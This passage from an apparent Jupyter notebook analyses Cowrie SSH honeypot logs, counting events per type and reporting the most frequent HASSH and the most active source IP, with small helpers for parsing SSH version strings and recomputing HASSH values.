IP with highest interactions: 87.120.127.241, number of interactions: 571
---
Filtered data for 'cowrie.client.version':
---cut for github version---
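
An SSH identification string such as `SSH-2.0-Go` follows the layout `SSH-protoversion-softwareversion`, optionally followed by a space and a comment. A small sketch that splits it into its parts makes it possible to group clients by software rather than by the full string. `parse_ssh_ident` is a hypothetical helper, and the second example string is made up.

```python
def parse_ssh_ident(version):
    """Split an SSH identification string into (protocol, software, comment)."""
    if not version.startswith('SSH-'):
        return None
    body, _, comment = version.strip().partition(' ')
    parts = body.split('-', 2)
    if len(parts) < 3:
        return None
    _, protocol, software = parts
    return protocol, software, comment or None

print(parse_ssh_ident('SSH-2.0-Go'))
print(parse_ssh_ident('SSH-2.0-OpenSSH_8.9p1 Ubuntu-3'))
```

Splitting with a maximum of two separators keeps hyphens inside the software name intact.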


### cowrie.client.kex

SSH Key Exchange Attributes. The code below prints:
- the total number of events for this event id
- the most frequent HASSH
- the IP with the highest number of interactions, together with that number
- all the data related to this event id

In [56]:
# Number of rows
num_rows_kex = filtered_data['cowrie.client.kex'].shape[0]
if num_rows_kex > 0:
  # Most frequent HASSH
  most_frequent_hassh_version = filtered_data['cowrie.client.kex']['hassh'].value_counts().idxmax()

  # IP with highest interactions
  most_interactive_ip_kex = filtered_data['cowrie.client.kex']['src_ip'].value_counts().idxmax()

  # Number of interactions for the IP with highest interactions
  most_interactive_ip_count_kex = filtered_data['cowrie.client.kex']['src_ip'].value_counts().max()

  print(f"Number of events: {num_rows_kex}")
  print(f"Most frequent HASSH: {most_frequent_hassh_version}")
  print(f"IP with highest interactions: {most_interactive_ip_kex}, number of interactions: {most_interactive_ip_count_kex}")
  print("---")
  print("Filtered data for 'cowrie.client.kex':") #---cut for github version---
  print("---cut for github version---")
  #print(filtered_data['cowrie.client.kex'].to_markdown())

Number of events: 1425
Most frequent HASSH: 5f904648ee8964bef0e8834012e26003
IP with highest interactions: 87.120.127.241, number of interactions: 571
---
Filtered data for 'cowrie.client.kex':
---cut for github version---
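
A HASSH value is commonly described as the MD5 hash of the client's key exchange, encryption, MAC, and compression algorithm lists joined with semicolons. Assuming the `hasshAlgorithms` field holds exactly that joined string (an assumption, not verified against the Cowrie source here), a logged `hassh` could be recomputed as a sanity check. The helper names and the algorithm string below are hypothetical.

```python
import hashlib

def hassh_from_algorithms(algorithms):
    """Return the MD5 hex digest of a semicolon-joined algorithm string."""
    return hashlib.md5(algorithms.encode('utf-8')).hexdigest()

def hassh_matches(event):
    """Check that the logged hassh equals the hash of the logged algorithm string."""
    return hassh_from_algorithms(event['hasshAlgorithms']) == event['hassh']

# Made-up algorithm string for illustration only
algorithms = 'curve25519-sha256;aes128-ctr;hmac-sha2-256;none'
event = {'hasshAlgorithms': algorithms, 'hassh': hassh_from_algorithms(algorithms)}
print(event['hassh'], hassh_matches(event))
```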


### cowrie.direct-tcpip.request

Request for proxying via the honeypot.
The code below prints:
- the total number of events for this event id
- all the data related to this event id

In [57]:
# Number of rows
num_rows_direct_tcpip_request = filtered_data['cowrie.direct-tcpip.request'].shape[0]


print(f"Number of events: {num_rows_direct_tcpip_request}")
print("---")
print("Filtered data for 'cowrie.direct-tcpip.request':") #---cut for github version---
print("---cut for github version---")
#print(filtered_data['cowrie.direct-tcpip.request'].to_markdown())

Number of events: 8
---
Filtered data for 'cowrie.direct-tcpip.request':
---cut for github version---


### cowrie.direct-tcpip.data

Data attempted to be sent through direct-tcpip forwarding. The code below prints:
- the total number of events for this event id
- all the data related to this event id

In [58]:
# Number of events
num_rows_direct_tcpipdata = filtered_data['cowrie.direct-tcpip.data'].shape[0]

print(f"Number of events: {num_rows_direct_tcpipdata}")
print("---")
print("Filtered data for 'cowrie.direct-tcpip.data':") #---cut for github version---
print("---cut for github version---")
#print(filtered_data['cowrie.direct-tcpip.data'].to_markdown())

Number of events: 6
---
Filtered data for 'cowrie.direct-tcpip.data':
---cut for github version---


### cowrie.virustotal.scanfile

File sent to VirusTotal (VT) for scanning. The code below prints:
- the total number of events for this event id
- all the data related to this event id

In [59]:
# Number of events
num_rows_vt = filtered_data['cowrie.virustotal.scanfile'].shape[0]

print(f"Number of events: {num_rows_vt}")
print("---")
print("Filtered data for 'cowrie.virustotal.scanfile':") #---cut for github version---
print("---cut for github version---")
#print(filtered_data['cowrie.virustotal.scanfile'].to_markdown())

Number of events: 0
---
Filtered data for 'cowrie.virustotal.scanfile':
---cut for github version---


### cowrie.client.var

The code below prints:
- the total number of events for this event id
- all the data related to this event id

In [60]:
# Number of events
num_rows_client_var = filtered_data['cowrie.client.var'].shape[0]

print(f"Number of events: {num_rows_client_var}")
print("---")
print("Filtered data for 'cowrie.client.var':") #---cut for github version---
print("------cut for github version------")
# print(filtered_data['cowrie.client.var'].to_markdown())

Number of events: 0
---
Filtered data for 'cowrie.client.var':
------cut for github version------


### cowrie.log.closed

TTY Log closed. The code below prints:
- the total number of events for this event id
- all the data related to this event id

In [61]:
# Number of events
num_rows_log_closed = filtered_data['cowrie.log.closed'].shape[0]

print(f"Number of events: {num_rows_log_closed}")
print("---")
print("Filtered data for 'cowrie.log.closed':") #---cut for github version---
print("---cut for github version---")
#print(filtered_data['cowrie.log.closed'].to_markdown())

Number of events: 211
---
Filtered data for 'cowrie.log.closed':
---cut for github version---


### cowrie.session.params

Session params. The code below prints:
- the total number of events for this event id
- all the data related to this event id

In [62]:
# Number of events
num_rows_session_params = filtered_data['cowrie.session.params'].shape[0]

print(f"Number of events: {num_rows_session_params}")
print("---")
print("Filtered data for 'cowrie.session.params':") #---cut for github version---
print("---cut for github version---")
# print(filtered_data['cowrie.session.params'].to_markdown())

Number of events: 211
---
Filtered data for 'cowrie.session.params':
---cut for github version---
